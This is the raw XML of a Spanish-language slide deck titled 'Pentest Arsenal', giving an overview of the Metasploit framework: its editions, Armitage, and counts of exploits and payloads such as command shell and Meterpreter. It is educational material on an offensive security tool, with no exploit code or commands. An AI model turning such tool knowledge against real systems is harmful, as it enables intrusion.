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8"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="290" r:id="rId3"/>
    <p:sldId id="291" r:id="rId4"/>
    <p:sldId id="270" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="258" r:id="rId8"/>
    <p:sldId id="295" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="296" r:id="rId11"/>
    <p:sldId id="297" r:id="rId12"/>
    <p:sldId id="273" r:id="rId13"/>
    <p:sldId id="272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59" r:id="rId27"/>
    <p:sldId id="286" r:id="rId28"/>
    <p:sldId id="300" r:id="rId29"/>
    <p:sldId id="287" r:id="rId30"/>
    <p:sldId id="298" r:id="rId31"/>
    <p:sldId id="299" r:id="rId32"/>
    <p:sldId id="292" r:id="rId33"/>
    <p:sldId id="288" r:id="rId34"/>
    <p:sldId id="289" r:id="rId35"/>
    <p:sldId id="301" r:id="rId36"/>
    <p:sldId id="302" r:id="rId37"/>
    <p:sldId id="303" r:id="rId38"/>
    <p:sldId id="305" r:id="rId39"/>
    <p:sldId id="310" r:id="rId40"/>
    <p:sldId id="308" r:id="rId41"/>
    <p:sldId id="306" r:id="rId42"/>
    <p:sldId id="304" r:id="rId43"/>
    <p:sldId id="307" r:id="rId44"/>
    <p:sldId id="312" r:id="rId45"/>
    <p:sldId id="311" r:id="rId46"/>
    <p:sldId id="263" r:id="rId47"/>
    <p:sldId id="264" r:id="rId48"/>
    <p:sldId id="309" r:id="rId49"/>
    <p:sldId id="293" r:id="rId50"/>
    <p:sldId id="266" r:id="rId51"/>
    <p:sldId id="267" r:id="rId52"/>
    <p:sldId id="269" r:id="rId53"/>
    <p:sldId id="268" r:id="rId54"/>
    <p:sldId id="262" r:id="rId55"/>
    <p:sldId id="260" r:id="rId56"/>
    <p:sldId id="294" r:id="rId57"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId59"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId60"/>
      <p:italic r:id="rId61"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId62"/>
      <p:bold r:id="rId63"/>
      <p:italic r:id="rId64"/>
      <p:boldItalic r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId66"/>
      <p:bold r:id="rId67"/>
      <p:italic r:id="rId68"/>
      <p:boldItalic r:id="rId69"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="es-U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253" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="5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U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89E65A-93A7-4635-AAE0-421A8DA7153F}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es-U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U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U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88286A-CA51-425A-B4FA-47AF92213478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655335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es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=8" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=4" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=7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s.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=6" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=5" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Metasploit#cite_note-ediciones_Metasploit-3" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Metasploit#cite_note-4" TargetMode="Externa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s.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=8" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=4" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=7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s.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=6" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=5" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Metasploit#cite_note-ediciones_Metasploit-3" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Metasploit#cite_note-4" TargetMode="Externa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s.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=8" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=4" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=7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s.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=6" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/w/index.php?title=Metasploit&amp;action=edit&amp;section=5" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Metasploit#cite_note-ediciones_Metasploit-3" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://es.wikipedia.org/wiki/Metasploit#cite_note-4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Y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Edición </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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s-UY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Editar sección: Edición Metasploit"/>
              </a:rPr>
              <a:t>editar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es-UY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versión gratuita. Contiene una interfaz de línea de comandos, la importación de terceros, la explotación manual y fuerza bruta. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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3</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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UY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Edición Community </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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s-UY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Editar sección: Edición Community Metasploit"/>
              </a:rPr>
              <a:t>editar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es-UY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octubre de 2011, Rapid7 liberado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Community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Edition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una interfaz de usuario basada en la web gratuita para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community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incluye, detección de redes, navegación por módulo y la explotación manual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY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UY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express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s-UY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ditar sección: Metasploit express"/>
              </a:rPr>
              <a:t>editar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es-UY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abril de 2010, Rapid7 libero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Express, una edición comercial de código abierto, para los equipos de seguridad que necesitan verificar vulnerabilidades. Ofrece una interfaz gráfica de usuario, integra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nmap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el descubrimiento, y añade fuerza bruta inteligente, así como la recopilación de pruebas automatizado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY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s-UY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Editar sección: Metasploit Pro"/>
              </a:rPr>
              <a:t>editar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es-UY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octubre de 2010, Rapid7 añadió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Pro, de código abierto para pruebas de penetración.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incluye todas las características de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Express y añade la exploración y explotación de aplicaciones web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY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Armitage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s-UY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Editar sección: Armitage"/>
              </a:rPr>
              <a:t>editar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es-UY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Armitage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una herramienta de gestión gráfica para ciberataques del Proyecto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visualiza objetivos y recomienda métodos de ataque. Es un herramienta para ingenieros en seguridad web y es de código abierto. Destaca por sus contribuciones a la colaboración del equipo rojo, permitiendo sesiones compartidas, datos y comunicación a través de una única instancia Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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4</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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8286A-CA51-425A-B4FA-47AF92213478}" type="slidenum">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>9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172387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Y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Edición </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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s-UY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Editar sección: Edición Metasploit"/>
              </a:rPr>
              <a:t>editar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es-UY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versión gratuita. Contiene una interfaz de línea de comandos, la importación de terceros, la explotación manual y fuerza bruta. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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3</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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UY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Edición Community </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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s-UY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Editar sección: Edición Community Metasploit"/>
              </a:rPr>
              <a:t>editar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es-UY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octubre de 2011, Rapid7 liberado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Community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Edition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una interfaz de usuario basada en la web gratuita para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community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incluye, detección de redes, navegación por módulo y la explotación manual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY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UY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express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s-UY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ditar sección: Metasploit express"/>
              </a:rPr>
              <a:t>editar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es-UY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abril de 2010, Rapid7 libero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Express, una edición comercial de código abierto, para los equipos de seguridad que necesitan verificar vulnerabilidades. Ofrece una interfaz gráfica de usuario, integra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nmap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el descubrimiento, y añade fuerza bruta inteligente, así como la recopilación de pruebas automatizado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY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s-UY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Editar sección: Metasploit Pro"/>
              </a:rPr>
              <a:t>editar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es-UY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octubre de 2010, Rapid7 añadió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Pro, de código abierto para pruebas de penetración.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incluye todas las características de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Express y añade la exploración y explotación de aplicaciones web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY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Armitage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s-UY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Editar sección: Armitage"/>
              </a:rPr>
              <a:t>editar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es-UY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Armitage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una herramienta de gestión gráfica para ciberataques del Proyecto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visualiza objetivos y recomienda métodos de ataque. Es un herramienta para ingenieros en seguridad web y es de código abierto. Destaca por sus contribuciones a la colaboración del equipo rojo, permitiendo sesiones compartidas, datos y comunicación a través de una única instancia Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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4</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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8286A-CA51-425A-B4FA-47AF92213478}" type="slidenum">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>10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509680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Y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Edición </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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s-UY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Editar sección: Edición Metasploit"/>
              </a:rPr>
              <a:t>editar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es-UY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versión gratuita. Contiene una interfaz de línea de comandos, la importación de terceros, la explotación manual y fuerza bruta. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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3</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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UY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Edición Community </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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s-UY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Editar sección: Edición Community Metasploit"/>
              </a:rPr>
              <a:t>editar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es-UY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octubre de 2011, Rapid7 liberado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Community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Edition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una interfaz de usuario basada en la web gratuita para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community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incluye, detección de redes, navegación por módulo y la explotación manual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY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UY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express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s-UY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ditar sección: Metasploit express"/>
              </a:rPr>
              <a:t>editar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es-UY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abril de 2010, Rapid7 libero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Express, una edición comercial de código abierto, para los equipos de seguridad que necesitan verificar vulnerabilidades. Ofrece una interfaz gráfica de usuario, integra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nmap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el descubrimiento, y añade fuerza bruta inteligente, así como la recopilación de pruebas automatizado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY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s-UY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Editar sección: Metasploit Pro"/>
              </a:rPr>
              <a:t>editar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es-UY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octubre de 2010, Rapid7 añadió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Pro, de código abierto para pruebas de penetración.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incluye todas las características de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Express y añade la exploración y explotación de aplicaciones web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY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Armitage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s-UY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Editar sección: Armitage"/>
              </a:rPr>
              <a:t>editar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es-UY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Armitage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una herramienta de gestión gráfica para ciberataques del Proyecto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-U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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-U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visualiza objetivos y recomienda métodos de ataque. Es un herramienta para ingenieros en seguridad web y es de código abierto. Destaca por sus contribuciones a la colaboración del equipo rojo, permitiendo sesiones compartidas, datos y comunicación a través de una única instancia Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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4</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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8286A-CA51-425A-B4FA-47AF92213478}" type="slidenum">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>11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096590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U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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es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AC4BE-3D05-43D3-BACF-7DB5399276C4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511388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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es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AC4BE-3D05-43D3-BACF-7DB5399276C4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527511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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es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AC4BE-3D05-43D3-BACF-7DB5399276C4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813335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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es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AC4BE-3D05-43D3-BACF-7DB5399276C4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44018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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es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AC4BE-3D05-43D3-BACF-7DB5399276C4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449690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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es-U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AC4BE-3D05-43D3-BACF-7DB5399276C4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424899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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es-U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AC4BE-3D05-43D3-BACF-7DB5399276C4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997759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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es-U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AC4BE-3D05-43D3-BACF-7DB5399276C4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003105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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es-U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AC4BE-3D05-43D3-BACF-7DB5399276C4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585581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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es-U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AC4BE-3D05-43D3-BACF-7DB5399276C4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57419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3D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es-U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AC4BE-3D05-43D3-BACF-7DB5399276C4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795311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13D21-5CB1-4625-9483-3CD195865D77}" type="datetimeFigureOut">
              <a:rPr lang="es-UY" smtClean="0"/>
              <a:t>4/5/2017</a:t>
            </a:fld>
            <a:endParaRPr lang="es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AC4BE-3D05-43D3-BACF-7DB5399276C4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213707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169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9501" y="0"/>
            <a:ext cx="9144000" cy="1115736"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="8000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Arsenal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99501" y="5429076"/>
            <a:ext cx="9144000" cy="1344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UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Mr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>rodriguez</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="HACKED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579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1278" y="848412"/>
            <a:ext cx="1044489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Metasploit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actualmente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cuenta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>más</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de 1700 exploits, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>organizados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en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categorías</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: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</a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ejecución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remota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en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navegadores</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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</a:rPr>
              <a:t>Android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apple's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iOs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dedicados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dispostivos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móviles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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</a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows, BSD, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Irix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Solaris (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sistemas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operativos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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</a:rPr>
              <a:t>Multi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> para exploits que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sirven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>más</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sistema</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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842543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1278" y="848412"/>
            <a:ext cx="10444899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Metasploit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posee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 480 payloads. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Algunos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ellos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> son: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2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permite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ejecutar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> scripts y commandos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arbitrarios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2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> control de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pantalla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>través</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de VNC, commandos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rápidos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>descarga</a:t>
            </a:r>
            <a:r>
